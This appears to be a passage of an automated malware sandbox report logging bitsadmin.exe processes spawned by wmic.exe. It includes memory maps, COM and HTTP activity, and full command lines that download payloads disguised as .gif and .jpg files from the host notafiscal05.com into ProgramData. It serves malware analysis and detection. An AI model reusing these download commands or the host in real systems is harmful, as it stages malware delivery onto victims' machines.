pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x00070000	0x00070fff	Memory Mapped File	rw	-
private_0x0000000000080000	0x00080000	0x00080fff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x00090fff	Private Memory	rw	-
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	r	-
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	rw	-
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	r	-
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	r	-
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	rw	-
pagefile_0x0000000000270000	0x00270000	0x00337fff	Pagefile Backed Memory	r	-
rpcss.dll	0x00340000	0x0039bfff	Memory Mapped File	r	-
rsaenh.dll	0x00340000	0x0037bfff	Memory Mapped File	r	-
private_0x00000000003a0000	0x003a0000	0x003affff	Private Memory	rw	-
pagefile_0x00000000003b0000	0x003b0000	0x004b0fff	Pagefile Backed Memory	r	-
private_0x00000000004c0000	0x004c0000	0x006dffff	Private Memory	rw	-
pagefile_0x00000000004c0000	0x004c0000	0x0059efff	Pagefile Backed Memory	r	-
private_0x00000000005d0000	0x005d0000	0x0060ffff	Private Memory	rw	-
private_0x0000000000620000	0x00620000	0x0065ffff	Private Memory	rw	-
private_0x00000000006a0000	0x006a0000	0x006dffff	Private Memory	rw	-
sortdefault.nls	0x006e0000	0x009aefff	Memory Mapped File	r	-
bitsadmin.exe	0x00a40000	0x00a83fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a90000	0x00a90000	0x0168ffff	Pagefile Backed Memory	r	-
private_0x00000000016f0000	0x016f0000	0x0172ffff	Private Memory	rw	-
private_0x0000000001780000	0x01780000	0x017bffff	Private Memory	rw	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089, filename = C:\ProgramData\tempa\marxvxinhhmf.jpg	1	Fn

File (72)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	19	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xa40000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:57 (UTC)	4	Fn
Get Time	type = Ticks, time = 128264	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:58 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmf.jpg.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089	1	Fn

Process #14: bitsadmin.exe

92

4

»

Information	Value
ID	#14
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574 C:\ProgramData\tempa\marxvxinhhmg.gif
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:10, Reason: Child Process
Unmonitor	End Time: 00:01:12, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xc98
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C9C 0x CB0 0x CB4 0x CC4 0x CC8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x000e0000	0x000e0fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	r	-
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00257fff	Pagefile Backed Memory	r	-
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	rw	-
pagefile_0x0000000000370000	0x00370000	0x00470fff	Pagefile Backed Memory	r	-
rpcss.dll	0x00480000	0x004dbfff	Memory Mapped File	r	-
rsaenh.dll	0x00480000	0x004bbfff	Memory Mapped File	r	-
private_0x00000000004e0000	0x004e0000	0x004effff	Private Memory	rw	-
private_0x00000000004f0000	0x004f0000	0x005cffff	Private Memory	rw	-
pagefile_0x00000000005d0000	0x005d0000	0x006aefff	Pagefile Backed Memory	r	-
private_0x0000000000710000	0x00710000	0x0074ffff	Private Memory	rw	-
private_0x00000000007f0000	0x007f0000	0x0082ffff	Private Memory	rw	-
private_0x0000000000860000	0x00860000	0x0089ffff	Private Memory	rw	-
sortdefault.nls	0x008a0000	0x00b6efff	Memory Mapped File	r	-
private_0x0000000000b90000	0x00b90000	0x00bcffff	Private Memory	rw	-
bitsadmin.exe	0x00c10000	0x00c53fff	Memory Mapped File	rwx	-
pagefile_0x0000000000c60000	0x00c60000	0x0185ffff	Pagefile Backed Memory	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd3000	0x7ffd3000	0x7ffd3fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574, filename = C:\ProgramData\tempa\marxvxinhhmg.gif	1	Fn

File (74)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	18	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 18	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 24	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xc10000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (11)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:58 (UTC)	4	Fn
Get Time	type = Ticks, time = 129122	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:59 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmg.gif.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574	1	Fn

Process #15: bitsadmin.exe

91

4

»

Information	Value
ID	#15
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544 C:\ProgramData\tempa\marxvxinhhmgx.gif
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:11, Reason: Child Process
Unmonitor	End Time: 00:01:13, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xcd4
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x CD8 0x CEC 0x CF0 0x CF4 0x CF8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x0006ffff	Private Memory	rw	-
pagefile_0x0000000000070000	0x00070000	0x00073fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00080fff	Pagefile Backed Memory	r	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
pagefile_0x0000000000100000	0x00100000	0x001c7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001d0000	0x001d0000	0x001d6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x003f0fff	Pagefile Backed Memory	r	-
bitsadmin.exe.mui	0x00400000	0x00400fff	Memory Mapped File	rw	-
private_0x0000000000410000	0x00410000	0x00410fff	Private Memory	rw	-
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	rw	-
rpcss.dll	0x00430000	0x0048bfff	Memory Mapped File	r	-
pagefile_0x0000000000430000	0x00430000	0x00430fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000440000	0x00440000	0x00440fff	Pagefile Backed Memory	r	-
rsaenh.dll	0x00450000	0x0048bfff	Memory Mapped File	r	-
private_0x0000000000450000	0x00450000	0x0048ffff	Private Memory	rw	-
private_0x00000000004b0000	0x004b0000	0x004bffff	Private Memory	rw	-
private_0x00000000004c0000	0x004c0000	0x005dffff	Private Memory	rw	-
pagefile_0x00000000004c0000	0x004c0000	0x0059efff	Pagefile Backed Memory	r	-
private_0x00000000005a0000	0x005a0000	0x005dffff	Private Memory	rw	-
private_0x0000000000770000	0x00770000	0x007affff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0081ffff	Private Memory	rw	-
sortdefault.nls	0x00820000	0x00aeefff	Memory Mapped File	r	-
private_0x0000000000b20000	0x00b20000	0x00b5ffff	Private Memory	rw	-
bitsadmin.exe	0x00e30000	0x00e73fff	Memory Mapped File	rwx	-
pagefile_0x0000000000e80000	0x00e80000	0x01a7ffff	Pagefile Backed Memory	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544, filename = C:\ProgramData\tempa\marxvxinhhmgx.gif	1	Fn

File (74)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	18	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 23	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xe30000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:00 (UTC)	5	Fn
Get Time	type = Ticks, time = 130682	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	397 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	397
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmgx.gif.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544	1	Fn

Process #16: bitsadmin.exe

104

4

»

Information	Value
ID	#16
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115 C:\ProgramData\tempa\marxvxinhhmxa.gif
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:12, Reason: Child Process
Unmonitor	End Time: 00:01:14, Reason: Self Terminated
Monitor Duration	00:00:02

